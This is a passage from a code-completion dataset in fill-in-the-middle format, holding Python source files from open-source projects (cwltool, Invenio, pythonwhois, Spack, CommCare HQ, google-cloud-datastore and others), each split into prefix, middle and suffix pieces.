repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
common-workflow-language/cwltool
|
tests/test_empty_input.py
|
Python
|
apache-2.0
| 513
| 0
|
from io import StringIO
from pathlib import Path
from cwltool.main import main
from .util import get_data
def test_empty_input(tmp_path: Path) -> None:
"""Affirm that an empty input works."""
empty_json = "{}"
empty_input = StringIO(empty_json)
params = [
"--outdir",
str(tmp_path),
get_da
|
ta("tests/wf/no-parameters-echo.cwl"),
"-",
]
try:
assert main(params, stdin=empty_input) == 0
except SystemExit as err:
|
assert err.code == 0
|
alphagov/digitalmarketplace-api
|
migrations/versions/940_more_supplier_details.py
|
Python
|
mit
| 1,372
| 0.007289
|
""" Extend suppliers table with new fields (to be initially populated from declaration data)
Revision ID: 940
Revises: 930
Create Date: 2017-08-16 16:39:00.000000
"""
# revision identifiers, used by Alembic.
revision = '940'
down_revision = '93
|
0'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_co
|
lumn(u'suppliers', sa.Column('registered_name', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_country', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('other_company_registration_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_date', sa.DateTime(), nullable=True))
op.add_column(u'suppliers', sa.Column('vat_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('organisation_size', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('trading_status', sa.String(), nullable=True))
def downgrade():
op.drop_column(u'suppliers', 'registered_name')
op.drop_column(u'suppliers', 'registration_country')
op.drop_column(u'suppliers', 'other_company_registration_number')
op.drop_column(u'suppliers', 'registration_date')
op.drop_column(u'suppliers', 'vat_number')
op.drop_column(u'suppliers', 'organisation_size')
op.drop_column(u'suppliers', 'trading_status')
|
weiHelloWorld/accelerated_sampling_with_autoencoder
|
MD_simulation_on_alanine_dipeptide/current_work/src/biased_simulation.py
|
Python
|
mit
| 16,759
| 0.007101
|
"""
This file is for biased simulation for alanine dipeptide only, it is used as the test for
more general file biased_simulation_general.py, which could be easily extend to other new
systems.
"""
from ANN_simulation import *
from simtk.openmm.app import *
from simtk.openmm import *
from simtk.unit import *
from sys import stdout
import ast, argparse
import os
import datetime
from config import *
parser = argparse.ArgumentParser()
parser.add_argument("record_interval", type=int, help="interval to take snapshots")
parser.add_argument("total_num_of_steps", type=int, help="total number of simulation steps")
parser.add_argument("force_constant", type=float, help="force constants")
parser.add_argument("folder_to_store_output_files", type=str, help="folder to store the output pdb and report files")
parser.add_argument("autoencoder_info_file", type=str, help="file to store autoencoder information (coefficients)")
parser.add_argument("pc_potential_center", type=str, help="potential center (should include 'pc_' as prefix)")
parser.add_argument("--out_traj", type=str, default=None, help="output trajectory file")
parser.add_argument("--layer_types", type=str, default=str(CONFIG_27), help='layer types')
parser.add_argument("--num_of_nodes", type=str, default=str(CONFIG_3[:3]), help='number of nodes in each layer')
parser.add_argument("--temperature", type=int, default= CONFIG_21, help='simulation temperature')
parser.add_argument("--data_type_in_input_layer", type=int, default=1, help='data_type_in_input_layer, 0 = cos/sin, 1 = Cartesian coordinates')
parser.add_argument("--platform", type=str, default=CONFIG_23, help='platform on which the simulation is run')
parser.add_argument("--scaling_factor", type=float, default = float(CONFIG_49), help='sca
|
ling_factor for ANN_Force')
parser.add_argument("--starting_pdb_file", type=str, default='../resources/alanine_dipeptide.pdb', help='the input pdb file to start simulation')
parser.add_argument("--starting_frame", type=int, default=0, help="index of starting frame in the starting pdb file")
parser.add_argument("--minimize_energy", type=int, default=1, help='whether to minimize energy (1 = yes, 0 = no)')
|
parser.add_argument("--equilibration_steps", type=int, default=1000, help="number of steps for the equilibration process")
# next few options are for metadynamics
parser.add_argument("--bias_method", type=str, default='US', help="biasing method for enhanced sampling, US = umbrella sampling, MTD = metadynamics")
parser.add_argument("--MTD_pace", type=int, default=CONFIG_66, help="pace of metadynamics")
parser.add_argument("--MTD_height", type=float, default=CONFIG_67, help="height of metadynamics")
parser.add_argument("--MTD_sigma", type=float, default=CONFIG_68, help="sigma of metadynamics")
parser.add_argument("--MTD_WT", type=int, default=CONFIG_69, help="whether to use well-tempered version")
parser.add_argument("--MTD_biasfactor", type=float, default=CONFIG_70, help="biasfactor of well-tempered metadynamics")
# following is for plumed script
parser.add_argument("--plumed_file", type=str, default=None, help="plumed script for biasing force, used only when the bias_method == plumed_other")
parser.add_argument("--plumed_add_string", type=str, default="", help="additional string to be attached to the end of plumed script in args.plumed_file")
# note on "force_constant_adjustable" mode:
# the simulation will stop if either:
# force constant is greater or equal to max_force_constant
# or distance between center of data cloud and potential center is smaller than distance_tolerance
parser.add_argument("--fc_adjustable", help="set the force constant to be adjustable", action="store_true")
parser.add_argument("--max_fc", type=float, default=CONFIG_32, help="max force constant (for force_constant_adjustable mode)")
parser.add_argument("--fc_step", type=float, default=CONFIG_34, help="the value by which the force constant is increased each time (for force_constant_adjustable mode)")
parser.add_argument("--distance_tolerance", type=float, default=CONFIG_35, help="max distance allowed between center of data cloud and potential center (for force_constant_adjustable mode)")
parser.add_argument("--autoencoder_file", type=str, help="pkl file that stores autoencoder (for force_constant_adjustable mode)")
parser.add_argument("--remove_previous", help="remove previous outputs while adjusting force constants", action="store_true")
args = parser.parse_args()
record_interval = args.record_interval
total_number_of_steps = args.total_num_of_steps
input_data_type = ['cossin', 'Cartesian', 'pairwise'][args.data_type_in_input_layer]
force_constant = args.force_constant
scaling_factor = args.scaling_factor
layer_types = re.sub("\[|\]|\"|\'| ",'', args.layer_types).split(',')
num_of_nodes = re.sub("\[|\]|\"|\'| ",'', args.num_of_nodes).split(',')
num_of_nodes = [int(item) for item in num_of_nodes]
out_format = '.dcd' if args.out_traj is None else os.path.splitext(args.out_traj)[1]
if float(force_constant) != 0:
from ANN import *
folder_to_store_output_files = args.folder_to_store_output_files # this is used to separate outputs for different networks into different folders
autoencoder_info_file = args.autoencoder_info_file
potential_center = list([float(x) for x in args.pc_potential_center.replace('"','')\
.replace('pc_','').split(',')]) # this API is the generalization for higher-dimensional cases
if not os.path.exists(folder_to_store_output_files):
try: os.makedirs(folder_to_store_output_files)
except: pass
def run_simulation(force_constant):
assert(os.path.exists(folder_to_store_output_files))
input_pdb_file_of_molecule = args.starting_pdb_file
force_field_file = 'amber99sb.xml'
water_field_file = 'tip3p.xml'
pdb_reporter_file = '%s/output_fc_%f_pc_%s.pdb' %(folder_to_store_output_files, force_constant, str(potential_center).replace(' ',''))
if not args.out_traj is None:
pdb_reporter_file = args.out_traj
state_data_reporter_file = pdb_reporter_file.replace('output_fc', 'report_fc').replace('.pdb', '.txt')
# check if the file exist
for item_filename in [pdb_reporter_file, state_data_reporter_file]:
Helper_func.backup_rename_file_if_exists(item_filename)
index_of_backbone_atoms = CONFIG_57[0]
flag_random_seed = 0 # whether we need to fix this random seed
simulation_temperature = args.temperature
time_step = CONFIG_22 # simulation time step, in ps
pdb = PDBFile(input_pdb_file_of_molecule)
modeller = Modeller(pdb.topology, pdb.getPositions(frame=args.starting_frame))
solvent_opt = 'no_water'
if solvent_opt == 'explicit':
forcefield = ForceField(force_field_file, water_field_file)
modeller.addSolvent(forcefield, model=water_field_file.split('.xml')[0], boxSize=Vec3(3, 3, 3) * nanometers,
ionicStrength=0 * molar)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=PME, nonbondedCutoff=1.0 * nanometers,
constraints=AllBonds, ewaldErrorTolerance=0.0005)
else:
forcefield = ForceField(force_field_file)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=NoCutoff, constraints=AllBonds)
if args.bias_method == "US":
if float(force_constant) != 0:
force = ANN_Force()
force.set_layer_types(layer_types)
force.set_data_type_in_input_layer(args.data_type_in_input_layer)
force.set_list_of_index_of_atoms_forming_dihedrals_from_index_of_backbone_atoms(index_of_backbone_atoms)
force.set_index_of_backbone_atoms(index_of_backbone_atoms)
if args.data_type_in_input_layer == 2:
force.set_list_of_pair_index_for_distances(CONFIG_80)
force.set_num_of_nodes(num_of_nodes)
force.set_potential_center(potential_center)
force.set_force_constant(float(force_constant))
unit_scaling = 1.0 # TODO: check unit scaling
force.set_scaling_factor(float(scaling_factor) / unit_scaling) # since default unit is nm in O
|
goocarlos/domaindiscoverer
|
pythonwhois/net.py
|
Python
|
apache-2.0
| 4,072
| 0.030452
|
import socket, re, sys
from codecs import encode, decode
from . import shared
def get_whois_raw(domain, server="", previous=None, rfc3490=True, never_cut=False, with_server_list=False, server_list=None):
previous = previous or []
server_list = server_list or []
# Sometimes IANA simply won't give us the right root WHOIS server
exceptions = {
".ac.uk": "whois.ja.net",
".ps": "whois.pnina.ps",
".buzz": "whois.nic.buzz",
".moe": "whois.nic.moe",
# The following is a bit hacky, but IANA won't return the right answer for example.com because it's a direct registration.
"example.com": "whois.verisign-grs.com"
}
if rfc3490:
if sys.version_info < (3, 0):
domain = encode( domain if type(domain) is unicode else decode(domain, "utf8"), "idna" )
else:
domain = encode(domain, "idna").decode("ascii")
if len(previous) == 0 and server == "":
# Root query
is_exception = False
for exception, exc_serv in exceptions.items():
if domain.endswith(exception):
is_exception = True
target_server = exc_serv
break
if is_exception == False:
target_server = get_root_server(domain)
else:
target_server = server
if target_server == "whois.jprs.jp":
request_domain = "%s/e" % domain # Suppress Japanese output
elif domain.endswith(".de") and ( target_server == "whois.denic.de" or target_server == "de.whois-servers.net" ):
request_domain = "-T dn,ace %s" % domain # regional specific stuff
elif target_server == "whois.verisign-grs.com":
request_domain = "=%s" % domain # Avoid partial matches
else:
request_dom
|
ain = domain
response = whois_request(request_domain, target_server)
if never_cut:
# If the caller has requested to 'never cut' responses, he will get the original response from the server (this is
# useful for callers that are only interested in the raw data). Otherwise, if the target is verisign-grs, we will
# select the data relevant to the requested domain, and dis
|
card the rest, so that in a multiple-option response the
# parsing code will only touch the information relevant to the requested domain. The side-effect of this is that
# when `never_cut` is set to False, any verisign-grs responses in the raw data will be missing header, footer, and
# alternative domain options (this is handled a few lines below, after the verisign-grs processing).
new_list = [response] + previous
if target_server == "whois.verisign-grs.com":
# VeriSign is a little... special. As it may return multiple full records and there's no way to do an exact query,
# we need to actually find the correct record in the list.
for record in response.split("\n\n"):
if re.search("Domain Name: %s\n" % domain.upper(), record):
response = record
break
if never_cut == False:
new_list = [response] + previous
server_list.append(target_server)
for line in [x.strip() for x in response.splitlines()]:
match = re.match("(refer|whois server|referral url|whois server|registrar whois):\s*([^\s]+\.[^\s]+)", line, re.IGNORECASE)
if match is not None:
referal_server = match.group(2)
if referal_server != server and "://" not in referal_server: # We want to ignore anything non-WHOIS (eg. HTTP) for now.
# Referal to another WHOIS server...
return get_whois_raw(domain, referal_server, new_list, server_list=server_list, with_server_list=with_server_list)
if with_server_list:
return (new_list, server_list)
else:
return new_list
def get_root_server(domain):
data = whois_request(domain, "whois.iana.org")
for line in [x.strip() for x in data.splitlines()]:
match = re.match("refer:\s*([^\s]+)", line)
if match is None:
continue
return match.group(1)
raise shared.WhoisException("No root WHOIS server found for domain.")
def whois_request(domain, server, port=43):
socket.setdefaulttimeout(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server, port))
sock.send(("%s\r\n" % domain).encode("utf-8"))
buff = b""
while True:
data = sock.recv(1024)
if len(data) == 0:
break
buff += data
return buff.decode("utf-8")
|
EUDAT-B2SHARE/invenio-old
|
modules/websearch/lib/search_engine.py
|
Python
|
gpl-2.0
| 314,285
| 0.007118
|
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio Search Engine in mod_python."""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
## import general modules:
import cgi
import cStringIO
import copy
import string
import os
import re
import time
import urllib
import urlparse
import zlib
import sys
try:
## import optional module:
import numpy
CFG_NUMPY_IMPORTABLE = True
except:
CFG_NUMPY_IMPORTABLE = False
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
## import Invenio stuff:
from invenio.config import \
CFG_CERN_SITE, \
CFG_INSPIRE_SITE, \
CFG_OAI_ID_FIELD, \
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBSEARCH_CALL_BIBFORMAT, \
CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX, \
CFG_WEBSEARCH_FIELDS_CONVERT, \
CFG_WEBSEARCH_NB_RECORDS_TO_SORT, \
CFG_WEBSEARCH_SEARCH_CACHE_SIZE, \
CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT, \
CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS, \
CFG_WEBSEARCH_USE_ALEPH_SYSNOS, \
CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, \
CFG_WEBSEARCH_FULLTEXT_SNIPPETS, \
CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS, \
CFG_WEBSEARCH_WILDCARD_LIMIT, \
CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE, \
CFG_BIBUPLO
|
AD_EXTERNAL_SYSNO_TAG, \
CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS, \
CFG_WEBSEARCH_SYNONYM_KBRS, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_LOGDIR, \
CFG_BIBFORMAT_HIDDEN_TAGS, \
CFG_SITE_URL, \
CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS, \
CFG_SOLR_URL, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
CFG_SITE_RECORD, \
CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT, \
CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY, \
CFG_BIBSORT_BUCKETS, \
CFG_XAPIAN_ENABLED, \
|
CFG_BIBINDEX_CHARS_PUNCTUATION
from invenio.search_engine_config import \
InvenioWebSearchUnknownCollectionError, \
InvenioWebSearchWildcardLimitError, \
CFG_WEBSEARCH_IDXPAIRS_FIELDS,\
CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH, \
CFG_SEARCH_RESULTS_CACHE_PREFIX
from invenio.search_engine_utils import get_fieldvalues, get_fieldvalues_alephseq_like
from invenio.bibrecord import create_record, record_xml_output
from invenio.bibrank_record_sorter import get_bibrank_methods, is_method_valid, rank_records as rank_records_bibrank
from invenio.bibrank_downloads_similarity import register_page_view_event, calculate_reading_similarity_list
from invenio.bibindex_engine_stemmer import stem
from invenio.bibindex_tokenizers.BibIndexDefaultTokenizer import BibIndexDefaultTokenizer
from invenio.bibindex_tokenizers.BibIndexCJKTokenizer import BibIndexCJKTokenizer, is_there_any_CJK_character_in_text
from invenio.bibindex_engine_utils import author_name_requires_phrase_search
from invenio.bibindex_engine_washer import wash_index_term, lower_index_term, wash_author_name
from invenio.bibindex_engine_config import CFG_BIBINDEX_SYNONYM_MATCH_TYPE
from invenio.bibindex_engine_utils import get_idx_indexer
from invenio.bibformat import format_record, format_records, get_output_format_content_type, create_excel
from invenio.bibformat_config import CFG_BIBFORMAT_USE_OLD_BIBFORMAT
from invenio.bibrank_downloads_grapher import create_download_history_graph_and_box
from invenio.bibknowledge import get_kbr_values
from invenio.data_cacher import DataCacher
from invenio.websearch_external_collections import print_external_results_overview, perform_external_collection_search
from invenio.access_control_admin import acc_get_action_id
from invenio.access_control_config import VIEWRESTRCOLL, \
CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS, \
CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
from invenio.websearchadminlib import get_detailed_page_tabs, get_detailed_page_tabs_counts
from invenio.intbitset import intbitset
from invenio.dbquery import DatabaseError, deserialize_via_marshal, InvenioDbQueryWildcardLimitError
from invenio.access_control_engine import acc_authorize_action
from invenio.errorlib import register_exception
from invenio.textutils import encode_for_xml, wash_for_utf8, strip_accents
from invenio.htmlutils import get_mathjax_header
from invenio.htmlutils import nmtoken_from_string
import invenio.template
webstyle_templates = invenio.template.load('webstyle')
webcomment_templates = invenio.template.load('webcomment')
from invenio.bibrank_citation_searcher import calculate_cited_by_list, \
calculate_co_cited_with_list, get_records_with_num_cites, get_self_cited_by, \
get_refersto_hitset, get_citedby_hitset
from invenio.bibrank_citation_grapher import create_citation_history_graph_and_box
from invenio.dbquery import run_sql, run_sql_with_limit, wash_table_column_name, \
get_table_update_time
from invenio.webuser import getUid, collect_user_info, session_param_set
from invenio.webpage import pageheaderonly, pagefooteronly, create_error_box, write_warning
from invenio.messages import gettext_set_language
from invenio.search_engine_query_parser import SearchQueryParenthesisedParser, \
SpiresToInvenioSyntaxConverter
from invenio import webinterface_handler_config as apache
from invenio.solrutils_bibindex_searcher import solr_get_bitset
from invenio.xapianutils_bibindex_searcher import xapian_get_bitset
try:
import invenio.template
websearch_templates = invenio.template.load('websearch')
except:
pass
from invenio.websearch_external_collections import calculate_hosted_collections_results, do_calculate_hosted_collections_results
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH
from invenio.websearch_external_collections_config import CFG_EXTERNAL_COLLECTION_MAXRESULTS
VIEWRESTRCOLL_ID = acc_get_action_id(VIEWRESTRCOLL)
## global vars:
cfg_nb_browse_seen_records = 100 # limit of the number of records to check when browsing certain collection
cfg_nicely_ordered_collection_list = 0 # do we propose collection list nicely ordered or alphabetical?
## precompile some often-used regexp for speed reasons:
re_word = re.compile('[\s]')
re_quotes = re.compile('[\'\"]')
re_doublequote = re.compile('\"')
re_logical_and = re.compile('\sand\s', re.I)
re_logical_or = re.compile('\sor\s', re.I)
re_logical_not = re.compile('\snot\s', re.I)
re_operators = re.compile(r'\s([\+\-\|])\s')
re_pattern_wildcards_after_spaces = re.compile(r'(\s)[\*\%]+')
re_pattern_single_quotes = re.compile("'(.*?)'")
re_pattern_double_quotes = re.compile("\"(.*?)\"")
re_pattern_parens_quotes = re.compile(r'[\'\"]{1}[^\'\"]*(\([^\'\"]*\))[^\'\"]*[\'\"]{1}')
re_pattern_regexp_quotes = re.compile("\/(.*?)\/")
re_pattern_spaces_after_colon = re.compile(r'(:\s+)')
re_pattern_short_words = re.compile(r'([\s\"]\w{1,3})[\*\%]+')
re_pattern_space = re.compile("__SPACE__")
re_pattern_today = re.compile("\$TODAY\$")
re_pattern_parens = re.compile(r'\([^\)]+\s+[^\)]+\)')
re_punctuation_followed_by_space = re.compile(CFG_BIBINDEX_CHARS_PUNCTUATION + '\s')
## em possible values
EM_REPOSITORY={"body" : "B",
"header" : "H",
"footer" : "F",
"search_box" : "S",
"see_also_box" : "L",
"basket" : "K",
"alert" : "A",
|
TheTimmy/spack
|
lib/spack/external/__init__.py
|
Python
|
lgpl-2.1
| 2,139
| 0
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRAN
|
TY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place,
|
Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""
This module contains external, potentially separately licensed,
packages that are included in spack.
So far:
argparse: We include our own version to be Python 2.6 compatible.
distro: Provides a more stable linux distribution detection.
functools: Used for implementation of total_ordering.
jinja2: A modern and designer-friendly templating language for Python
jsonschema: An implementation of JSON Schema for Python.
ordereddict: We include our own version to be Python 2.6 compatible.
py: Needed by pytest. Library with cross-python path,
ini-parsing, io, code, and log facilities.
pyqver2: External script to query required python version of
python source code. Used for ensuring 2.6 compatibility.
pytest: Testing framework used by Spack.
yaml: Used for config files.
"""
|
dimagi/commcare-hq
|
corehq/apps/reports/standard/users/reports.py
|
Python
|
bsd-3-clause
| 10,221
| 0.00137
|
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from memoized import memoized
from corehq import privileges
from corehq.apps.accounting.models import BillingAccount
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.dispatcher import UserManagementReportDispatcher
from corehq.apps.reports.filters.users import (
ChangeActionFilter,
ChangedByUserFilter,
EnterpriseUserFilter,
)
from corehq.apps.reports.filters.users import \
ExpandedMobileWorkerFilter as EMWF
from corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin, PaginatedReportMixin
from corehq.apps.reports.standard import DatespanMixin, ProjectReport
from corehq.apps.users.audit.change_messages import (
ASSIGNED_LOCATIONS_FIELD,
CHANGE_MESSAGES_FIELDS,
DOMAIN_FIELD,
LOCATION_FIELD,
PHONE_NUMBERS_FIELD,
ROLE_FIELD,
TWO_FACTOR_FIELD,
get_messages,
)
from corehq.apps.users.models import UserHistory
from corehq.const import USER_DATETIME_FORMAT
from corehq.util.timezones.conversions import ServerTime
class UserHistoryReport(GetParamsMixin, DatespanMixin, GenericTabularReport, ProjectReport, PaginatedReportMixin):
slug = 'user_history'
name = ugettext_lazy("User History")
section_name = ugettext_lazy("User Management")
dispatcher = UserManagementReportDispatcher
fields = [
'corehq.apps.reports.filters.users.AffectedUserFilter',
'corehq.apps.reports.filters.users.ChangedByUserFilter',
'corehq.apps.reports.filters.dates.DatespanFilter',
'corehq.apps.reports.filters.users.ChangeActionFilter',
'corehq.apps.reports.filters.users.UserPropertyFilter',
'corehq.apps.reports.filters.users.UserUploadRecordFilter',
]
description = ugettext_lazy("History of user updates")
ajax_pagination = True
default_sort = {'changed_at': 'desc'}
@classmethod
def get_primary_properties(cls, domain):
"""
Get slugs and human-friendly names for the properties that are available
for filtering and/or displayed by default in the report, without
needing to click "See More".
"""
if domain_has_privilege(domain, privileges.APP_USER_PROFILES):
user_data_label = _("profile or user data")
else:
user_data_label = _("user data")
return {
"username": _("username"),
ROLE_FIELD: _("role"),
"email": _("email"),
DOMAIN_FIELD: _("project"),
"is_active": _("is active"),
"language": _("language"),
PHONE_NUMBERS_FIELD: _("phone numbers"),
LOCATION_FIELD: _("primary location"),
"user_data": user_data_label,
TWO_FACTOR_FIELD: _("two factor authentication disabled"),
ASSIGNED_LOCATIONS_FIELD: _("assigned locations"),
}
@property
def headers(self):
h = [
DataTablesColumn(_("Affected User"), sortable=False),
DataTablesColumn(_("Modified by User"), sortable=False),
DataTablesColumn(_("Action"), prop_name='action'),
DataTablesColumn(_("Via"), prop_name='changed_via'),
DataTablesColumn(_("Changes"), sortable=False),
DataTablesColumn(_("Change Message"), sortable=False),
DataTablesColumn(_("Timestamp"), prop_name='changed_at'),
]
return DataTablesHeader(*h)
@property
def total_records(self):
return self._get_queryset().count()
@memoized
def _get_queryset(self):
user_slugs = self.request.GET.getlist(EMWF.slug)
user_ids = self._get_user_ids(user_slugs)
# return empty queryset if no matching users were found
if user_slugs and not user_ids:
return UserHistory.objects.none()
changed_by_user_slugs = self.request.GET.getlist(ChangedByUserFilter.slug)
changed_by_user_ids = self._get_user_ids(changed_by_user_slugs)
# return empty queryset if no matching users were found
if changed_by_user_slugs and not changed_by_user_ids:
return UserHistory.objects.none()
user_property = self.request.GET.get('user_property')
actions = self.request.GET.getlist('action')
user_upload_record_id = self.request.GET.get('user_upload_record')
query = self._build_query(user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id)
return query
def _get_user_ids(self, slugs):
es_query = self._get_users_es_query(slugs)
return es_query.values_list('_id', flat=True)
def _get_users_es_query(self, slugs):
return EnterpriseUserFilter.user_es_query(
self.domain,
slugs,
self.request.couch_user,
)
def _build_query(self, user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id):
filters = Q(for_domain__in=self._for_domains())
if user_ids:
filters = filters & Q(user_id__in=user_ids)
if changed_by_user_ids:
filters = filters & Q(changed_by__in=changed_by_user_ids)
if user_property:
filters = filters & self._get_property_filters(user_property)
|
if actions and ChangeActionFilter.ALL not in actions:
filters = filte
|
rs & Q(action__in=actions)
if user_upload_record_id:
filters = filters & Q(user_upload_record_id=user_upload_record_id)
if self.datespan:
filters = filters & Q(changed_at__lt=self.datespan.enddate_adjusted,
changed_at__gte=self.datespan.startdate)
return UserHistory.objects.filter(filters)
def _for_domains(self):
return BillingAccount.get_account_by_domain(self.domain).get_domains()
@staticmethod
def _get_property_filters(user_property):
if user_property in CHANGE_MESSAGES_FIELDS:
query_filters = Q(change_messages__has_key=user_property)
# to include CommCareUser creation from UI where a location can be assigned as a part of user creation
# which is tracked only under "changes" and not "change messages"
if user_property == LOCATION_FIELD:
query_filters = query_filters | Q(changes__has_key='location_id')
else:
query_filters = Q(changes__has_key=user_property)
return query_filters
@property
def rows(self):
records = self._get_queryset().order_by(self.ordering)[
self.pagination.start:self.pagination.start + self.pagination.count
]
for record in records:
yield self._user_history_row(record, self.domain, self.timezone)
@property
def ordering(self):
by, direction = list(self.get_sorting_block()[0].items())[0]
return '-' + by if direction == 'desc' else by
@memoized
def _get_location_name(self, location_id):
from corehq.apps.locations.models import SQLLocation
if not location_id:
return None
try:
location_object = SQLLocation.objects.get(location_id=location_id)
except ObjectDoesNotExist:
return None
return location_object.display_name
def _user_history_row(self, record, domain, timezone):
return [
record.user_repr,
record.changed_by_repr,
_get_action_display(record.action),
record.changed_via,
self._user_history_details_cell(record.changes, domain),
self._html_list(list(get_messages(record.change_messages))),
ServerTime(record.changed_at).user_time(timezone).ui_string(USER_DATETIME_FORMAT),
]
def _html_list(self, changes):
items = []
if isinstanc
|
tseaver/google-cloud-python
|
datastore/tests/unit/test_client.py
|
Python
|
apache-2.0
| 44,363
| 0.000654
|
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
def _make_entity_pb(project, kind, integer_id, name=None, str_val=None):
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.helpers import _new_value_pb
entity_pb = entity_pb2.Entity()
entity_pb.key.partition_id.project_id = project
path_element = entity_pb.key.path.add()
path_element.kind = kind
path_element.id = integer_id
if name is not None and str_val is not None:
value_pb = _new_value_pb(entity_pb, name)
value_pb.string_value = str_val
return entity_pb
class Test__get_gcd_project(unittest.TestCase):
def _call_fut(self):
from google.cloud.datastore.client import _get_gcd_project
return _get_gcd_project()
def test_no_value(self):
environ = {}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertIsNone(project)
def test_value_set(self):
from google.cloud.datastore.client import GCD_DATASET
MOCK_PROJECT = object()
environ = {GCD_DATASET: MOCK_PROJECT}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertEqual(project, MOCK_PROJECT)
class Test__determine_default_project(unittest.TestCase):
def _call_fut(self, project=None):
from google.cloud.datastore.client import _determine_default_project
return _determine_default_project(project=project)
def _determine_default_helper(self, gcd=None, fallback=None, project_called=None):
_callers = []
def gcd_mock():
_callers.append("gcd_mock")
return gcd
def fallback_mock(project=None):
_callers.append(("fallback_mock", project))
return fallback
patch = mock.patch.multiple(
"google.cloud.datastore.client",
_get_gcd_project=gcd_mock,
_base_default_project=fallback_mock,
)
with patch:
returned_project = self._call_fut(project_called)
return returned_project, _callers
def test_no_value(self):
project, callers = self._determine_default_helper()
self.assertIsNone(project)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
def test_explicit(self):
PROJECT = object()
project, callers = self._determine_default_helper(project_called=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, [])
def test_gcd(self):
PROJECT = object()
project, callers = self._determine_default_helper(gcd=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock"])
def test_fallback(self):
PROJECT = object()
project, callers = self._determine_default_helper(fallback=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
